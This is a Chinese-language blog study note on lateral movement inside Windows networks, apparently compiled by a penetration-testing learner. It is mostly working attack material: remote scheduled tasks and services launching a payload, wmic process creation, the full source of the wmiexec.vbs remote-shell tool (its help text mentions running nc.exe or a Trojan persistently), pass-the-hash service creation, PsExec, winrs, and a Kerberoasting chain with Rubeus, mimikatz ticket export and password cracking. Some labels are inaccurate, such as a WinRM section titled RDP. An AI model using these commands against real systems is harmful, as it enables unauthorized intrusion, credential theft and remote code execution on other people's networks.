【笔记】横向移动

发表于 更新于 阅读次数:

前言

内网渗透横向移动学习笔记

IPC横向移动

查看已建立的远程连接

1
net use

建立远程连接

  • 通过IPC$共享文件夹建立远程连接

<ip>:远程IP地址
<username>:用户名
<password>:密码

1
net use \\<ip>\ipc$ <password> /user:<username>

<domain>:域名

1
net use \\<ip>\ipc$ <password> /user:<domain>\<username>

断开已建立的远程连接

断开指定IP地址的已建立的远程连接

1
net use \\<ip> /del

断开所有已建立的远程连接

1
net use * /del

向远程连接发送文件

c$:复制文件到C盘根文件夹

1
copy <file> \\<ip>\c$

查看远程的文件

1
dir \\<ip>\c$

获取当前时间

1
net time

远程创建计划任务

Windows 版本 < Windows Server 2012

通过at创建计划任务

\\<ip>:指定目标IP地址
00:00:任务执行的时间,小时:分钟
c:\<file>:任务执行的可执行程序

1
at \\<ip> 00:00 c:\<file>

Windows 版本 >= Windows Server 2012

通过schtasks创建计划任务

/S <ip>":指定目标IP地址
/U <username>":指定用户名
/P <password>":指定密码
/TN <task_name>:指定任务名
/TR c:\<file>":任务执行的可执行程序
/SC:定义触发时机

/SC ONCE /ST 00:00:在指定时间时执行
/SC ONSTART:每次系统启动后执行
/SC ONLOGIN:每次任意用户登录时执行
/SC MINUTE/SC HOURLY/SC DAILY/SC WEEKLY/SC MONTHLY:每间隔一段时间就执行一次

/F":达成触发时机时,不进行回显交互,直接执行
/RU "SYSTEM":以系统权限执行

1
schtasks /CREATE /S <ip> /U <username> /P <password> /TN <task_name> /TR c:\<file> /F
立即执行计划任务
1
schtasks /RUN /S <ip> /U <username> /P <password> /TN <task_name> /F
删除计划任务
1
schtasks /DELETE /S <ip> /U <username> /P <password> /TN <task_name> /F

WMI横向移动

wmic

  • Windows原生工具
  • 无回显,不能交互
1
wmic /node:<ip> /user:<username> /password:<password> process call create "cmd.exe /c <shell>"

wmiexec.vbs

  • 通过wmiexec.vbs实现远程命令执行
  • 需要先创建vbs脚本
  • 有回显,可以交互
wmiexec.vbs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
On Error Resume Next
'################################ Temp Result File , Change it to where you like
Const Path = "C:\"
Const FileName = "wmi.dll" 
Const timeOut = 1200
'################################
file = Path & "\" & FileName
file = Replace(file,"\\","\")
Set fso = CreateObject("Scripting.FileSystemObject")
FilePath = fso.GetParentFolderName(file) 'for wmi create share
'WScript.Echo FilePath

WAITTIME = timeOut              'ms  time to execute command ,read result file after 1200ms

Set objArgs = WScript.Arguments
intArgCount = objArgs.Count a
If intArgCount < 2 Or intArgCount > 5 Then
    WScript.Echo 
    WScript.Echo "   $$\      $$\ $$\      $$\ $$$$$$\ $$$$$$$$\ $$\   $$\ $$$$$$$$\  $$$$$$\  "
    WScript.Echo "   $$ | $\  $$ |$$$\    $$$ |\_$$  _|$$  _____|$$ |  $$ |$$  _____|$$  __$$\ "
    WScript.Echo "   $$ |$$$\ $$ |$$$$\  $$$$ |  $$ |  $$ |      \$$\ $$  |$$ |      $$ /  \__|"
    WScript.Echo "   $$ $$ $$\$$ |$$\$$\$$ $$ |  $$ |  $$$$$\     \$$$$  / $$$$$\    $$ |      "
    WScript.Echo "   $$$$  _$$$$ |$$ \$$$  $$ |  $$ |  $$  __|    $$  $$<  $$  __|   $$ |      "
    WScript.Echo "   $$$  / \$$$ |$$ |\$  /$$ |  $$ |  $$ |      $$  /\$$\ $$ |      $$ |  $$\ "
    WScript.Echo "   $$  /   \$$ |$$ | \_/ $$ |$$$$$$\ $$$$$$$$\ $$ /  $$ |$$$$$$$$\ \$$$$$$  |"
    WScript.Echo "   \__/     \__|\__|     \__|\______|\________|\__|  \__|\________| \______/ "
    WScript.Echo "                                               v1.1dev        By. Twi1ight   "
    WScript.Echo " Usage:" & _
                    vbTab & "wmiexec.vbs  /shell  host" & _
        vbNewLine & vbTab & "wmiexec.vbs  /shell  host  user  pass" & _
        vbNewLine & vbTab & "wmiexec.vbs  /cmd  host  command" & _
        vbNewLine & vbTab & "wmiexec.vbs  /cmd  host  user  pass  command" & vbNewLine & _
        vbNewLine & vbTab & "  /shell"  & vbTab & "half-interactive shell mode" & _
        vbNewLine & vbTab & "  /cmd" & vbTab & vbTab & "single command mode" & _
        vbNewLine & vbTab & "  host" & vbTab & vbTab & "hostname or IP address" & _
        vbNewLine & vbTab & "  command" & vbTab & "the command to execute on remote host" & _
        vbNewLine & vbNewLine & vbTab & "  -waitTIME" & vbTab & _
         "[both mode] ,delay TIME to read result,"& vbNewLine & vbTab & _
         vbTab & vbTab &"eg. 'systeminfo -wait5000' 'ping google.com -wait2000'" & _
        vbNewLine & vbTab & "  -persist" & vbTab & _
         "[both mode] ,running command background and persistent" & vbNewLine & vbTab & _
         vbTab & vbTab &"such as nc.exe or Trojan" 
    WScript.Quit()
End If

If LCase(objArgs.Item(0)) <> "/cmd" And LCase(objArgs.Item(0)) <> "/shell" Then 
    WScript.Echo "WMIEXEC ERROR: Wrong Mode Specified!"
    WScript.Quit
End If
boolShellMode = True
If LCase(objArgs.Item(0)) = "/cmd" Then boolShellMode = False
If boolShellMode = False Then command = objArgs.Item(intArgCount - 1)

host = objArgs.Item(1)
If intArgCount > 3 Then 
    user = objArgs.Item(2)
    pass = objArgs.Item(3)
    Set objShell = CreateObject("WScript.Shell")
    strNetUse = "cmd.exe /c net use \\" & host & " """ & pass & """ " & "/user:" & user
    'WScript.Echo strNetUse
    objShell.Run strNetUse,0
End If
'Output Status
WScript.Echo "WMIEXEC : Target -> " & host
WScript.Echo "WMIEXEC : Connecting..."

Set objLocator = CreateObject("wbemscripting.swbemlocator")
If intArgCount >2 Then
    set objWMIService = objLocator.connectserver(host,"root/cimv2",user,pass)
Else
    Set objWMIService = objLocator.ConnectServer(host,"root/cimv2")
End If
If Err.Number <> 0 Then
    WScript.Echo "WMIEXEC ERROR: " & Err.Description 
    WScript.Quit
End If
WScript.Echo "WMIEXEC : Login -> OK"
WScript.Echo "WMIEXEC : Result File -> " & file

boolPersist = False
'Create Share
CreateShare()
CurrentFolder = Null
'-----single Command mode------
If boolShellMode = False Then
    WAITTIME = 5000
    WScript.Echo vbNewLine & vbTab & host & "  >>  " & command
    boolGetFolder = False
    strResult = PhraseCmd( command )
    'WScript.Echo strResult
    If strResult = "persist" Then
        boolPersist = True
        Exec command,"nul"
    Else
        Exec command, file
        ReadResult()
    End If
    If intArgCount > 3 Then 
        Set objShell = CreateObject("WScript.Shell")
        strNetUse = "cmd.exe /c net use \\" & host & " /del"
        objShell.Run strNetUse,0
    End If
    DeleteShare()
    WScript.Quit
End If
'------------------------------

'++++++++shell mode++++++++++++
'get current working directory
boolGetFolder = True
CurrentFolder = Exec("cd", file)

'WScript.Echo CurrentFolder
Do While True
    boolPersist = False
    WAITTIME = timeOut
    wscript.stdout.write(CurrentFolder & ">")
    command = wscript.stdin.ReadLine
    'press 'Enter' directorly
    Do While command = ""
        wscript.stdout.write(CurrentFolder & ">")
        command = wscript.stdin.ReadLine
    Loop
    If LCase(Trim(command)) = "exit" Then Exit Do
    'If Not IsEmpty(command) Then 
    'process 'cd' command-------->>>>
    strResult = PhraseCmd( command )
    If strResult = "cd" Then 
        command = command & " & cd "
        boolGetFolder = True
        DestFolder = Exec(command, file)
        If CurrentFolder = DestFolder Then 
            WScript.Echo "The system cannot find the path specified."
        Else
            CurrentFolder = DestFolder
        End If
    ElseIf strResult = "persist" Then
        boolPersist = True
        'WScript.Echo "persist"
        Exec command,"nul"
        '##########################################toDo
    '-----------<<<<
    Else
        On Error Resume Next
        err.clear
        Exec command, file
        ReadResult()
        If err.number <> 0 Then wscript.echo( "WMIEXEC ERROR: " & Err.Number & " " & err.description)
        Err.Clear
        On Error Goto 0
    End If
loop

strDelFile = "del " & file & " /F"
Exec strDelFile,"nul"
If intArgCount > 3 Then 
    Set objShell = CreateObject("WScript.Shell")
    strNetUse = "cmd.exe /c net use \\" & host & " /del"
    objShell.Run strNetUse,0
End If
DeleteShare()

'#####################################
Function PhraseCmd(cmd)
    PhraseCmd = False ' not 'cd'
    arrCommand = Split(cmd)
    strExe = arrCommand(0)
    If LCase(Trim(strExe)) = "cd" Or LCase(Trim(strExe)) = "cd.exe" Then PhraseCmd = "cd"  ' is 'cd'
    Set regEx = New RegExp
    regEx.Pattern = "^[a-z]:$"
    regEx.IgnoreCase = True
    Set Matches = regEx.Execute(cmd)
    If Matches.Count <> 0 Then PhraseCmd = "cd" ' is 'd:'
    'phrase time command
    regEx.Pattern = "(.*?)-wait(\d+)"
    regEx.IgnoreCase = True
    Set Matches = regEx.Execute(cmd)
    If Matches.Count <> 0 Then 
        Set objMatch = Matches(0)
        command = objMatch.SubMatches(0)
        'WScript.Echo "Command :" & command
        WAITTIME = CInt(objMatch.SubMatches(1))
        WScript.Echo "WMIEXEC : Waiting " & WAITTIME & " ms..." & vbNewLine
    End If
    'phrase persist command
    regEx.Pattern = "(.*?)-persist"
    regEx.IgnoreCase = True
    Set Matches = regEx.Execute(cmd)
    If Matches.Count <> 0 Then 
        Set objMatch = Matches(0)
        command = objMatch.SubMatches(0)
        PhraseCmd = "persist"  ' is quiet
    End If
End Function

Function CreateShare()
    'create share
    Set objNewShare = objWMIService.Get("Win32_Share")
    intReturn = objNewShare.Create _
        (FilePath, "WMI_SHARE", 0, 25, "")
    If intReturn <> 0 Then
        WScript.Echo "WMIEXEC ERROR: Share could not be created." & _
            vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
        Select Case intReturn
            Case 2
                WScript.Echo "WMIEXEC ERROR: Access Denied!"
            Case 9
                WScript.Echo "WMIEXEC ERROR: Invalid File Path!"
            Case 22
                WScript.Echo "WMIEXEC ERROR: Share Name Already In Used!"
            Case 24
                WScript.Echo "WMIEXEC ERROR: Directory NOT exists!"
        End Select
        If intReturn <> 22 Then WScript.Quit
    Else
        WScript.Echo "WMIEXEC : Share created sucess."
        WScript.Echo "WMIEXEC : Share Name -> WMI_SHARE"
        WScript.Echo "WMIEXEC : Share Path -> " & FilePath
    End If
End Function

Function DeleteShare()
    Set colShares = objWMIService.ExecQuery _
        ("Select * from Win32_Share Where Name = 'WMI_SHARE'")
    For Each objShare In colShares
        intReturn = objShare.Delete
    Next
    If intReturn <> 0 Then
        WScript.Echo "WMIEXEC ERROR: Delete Share failed." & _
            vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
        Select Case intReturn
            Case 2
                WScript.Echo "WMIEXEC ERROR: Access Denied!"
            Case 25
                WScript.Echo "WMIEXEC ERROR: Share Not Exists!"
        End Select
    Else
        WScript.Echo "WMIEXEC : Share deleted sucess."
    End If
End Function

Function Exec(cmd, file)
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = 12
    
    Set objProcess=objWMIService.get("Win32_Process")
    strExec = "cmd.exe /c " & cmd & " > " & file & " 2>&1"  '2>&1 err
    If boolPersist Then
        strExec = cmd
        intPath = InStr(cmd,"\")
        If intPath = 0 Then strExec = CurrentFolder & "\" & strExec
    End If
    'WScript.Echo strExec
    intReturn = objProcess.Create _
        (strExec, CurrentFolder, objConfig, intProcessID)  'Add CurrentFolder (strExec, Null, objConfig, intProcessID)
    If intReturn <> 0 Then
        WScript.Echo "WMIEXEC ERROR: Process could not be created." & _
            vbNewLine & "WMIEXEC ERROR: Command -> " & cmd & _
            vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
        Select Case intReturn
            Case 2
                WScript.Echo "WMIEXEC ERROR: Access Denied!"
            Case 3
                WScript.Echo "WMIEXEC ERROR: Insufficient Privilege!"
            Case 9
                WScript.Echo "WMIEXEC ERROR: Path Not Found!"
        End Select
    Else
'        WScript.Echo "Process created." & _
'            vbNewLine & "Command: " & cmd & _
'            vbNewLine & "Process ID: " & intProcessID
        If boolPersist Then WScript.Echo "WMIEXEC : Process created. PID: "& intProcessID
        If boolGetFolder = True Then 
            boolGetFolder = False
            Exec = GetCurrentFolder()
            Exit Function
        End If
        'ReadResult()
    End If
End Function

Function ReadResult()
    WScript.Sleep(WAITTIME)
    UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & FileName
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set objFile = fso.OpenTextFile(UNCFilePath, 1)
    If Not objFile.AtEndOfStream Then strContents = objFile.ReadAll
    objFile.Close
    WScript.Echo strContents
    'fso.DeleteFile(UNCFilePath)   win2008 fso has no privilege to delete file on share folder
    strDelFile = "del " & file & " /F"
    Exec strDelFile,"nul"
End Function

Function GetCurrentFolder()
    WScript.Sleep(WAITTIME)
    UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & FileName
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set objFile = fso.OpenTextFile(UNCFilePath, 1)
    GetCurrentFolder = objFile.ReadLine
    objFile.Close
    strDelFile = "del " & file & " /F"
    Exec strDelFile,"nul"
End Function
1
cscript //nologo wmiexec.vbs /shell <ip> <password> <password>

SMB横向移动

Services

  • Windows内置工具
  • 无回显,不能交互

创建服务

明文连接
1
services ./<username>:<password>@<ip> create -name shell -display shellexec -path C:\Windows\System32\shell.exe
密文连接
1
services -hashes :xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ./<username>@<ip> create -name shell -display shellexec -path C:\Windows\System32\shell.exe

运行服务

明文连接
1
services ./<username>:<password>@<ip> start -name shell
密文连接
1
services -hashes :xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ./<username>@<ip> start -name shell

PsExec

  • Microsoft官方工具
  • 有回显,可以交互

下载依赖

1
2
3
certutil -urlcache -split -f https://download.sysinternals.com/files/PSTools.zip
"C:\Program Files\7-Zip\7z.exe" x PSTools.zip -oPSTools
cd PSTools

横向移动

1
.\PsExec64.exe \\<ip> -u <username> -p <password> -s cmd

RDP横向移动

  • 连接与被连接双方必须都开启WinRM服务(Windows远程管理服务),端口号为5985
    • Windows7以上默认开启
    • Windows7及以下默认关闭

横向移动

1
winrs -r:<ip> -u:<username> -p:<password> <cmd>
1
winrs -r:<ip> -u:<domain>\<username> -p:<password> <cmd>

Kerberos横向移动

  • 利用Windows服务通讯提取凭据
  • 暴力破解采用RC4加密的凭据的密码

寻找目标

  • 凭据采用RC4加密

通过PowerShell寻找目标

  • 手动一个一个查找采用RC4加密的凭据的Windows服务
查看域内主机启用的Windows服务
1
setspn -T <domain> -q */*
筛选
1
setspn -T <domain> -q */* | findstr "<str>"
建立连接

MSSQLSvc/Srv-DB-<domain>:1433:上一步骤得到的服务全名

1
2
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/Srv-DB-<domain>:1433"
查看凭据
1
klist

通过Rubeus

  • 直接得到采用RC4加密的凭据的Windows服务
下载源码
1
2
certutil -urlcache -split -f https://github.com/GhostPack/Rubeus/archive/refs/tags/1.6.4.zip
"C:\Program Files\7-Zip\7z.exe" x 1.6.4.zip
通过VisualStudio编译源码
  • 通过VisualStudio打开Rubeus-1.6.4/Rubeus.sln文件,编译项目

  • 生成Rubeus-1.6.4/Rubeus/bin/Debug/Rubeus.exe文件
判断凭据的加密协议为RC4的目标
1
.\Rubeus.exe asktgt kerberoast
查看凭据
1
klist

通过mimikatz导出凭据

1
mimikatz kerberos::list /export

暴力破解凭据

下载依赖

1
2
git clone https://github.com/nidem/kerberoast.git
cd kerberoast

暴力破解

<file>.txt:字典文件
<file_ticket>:上一步骤导出的凭据文件

1
python3 tgsrepcrack.py <file>.txt <file_ticket>

完成

参考文献

freebuf——Anonymous_124
西瓜视频——爱比较
CSDN——jataflf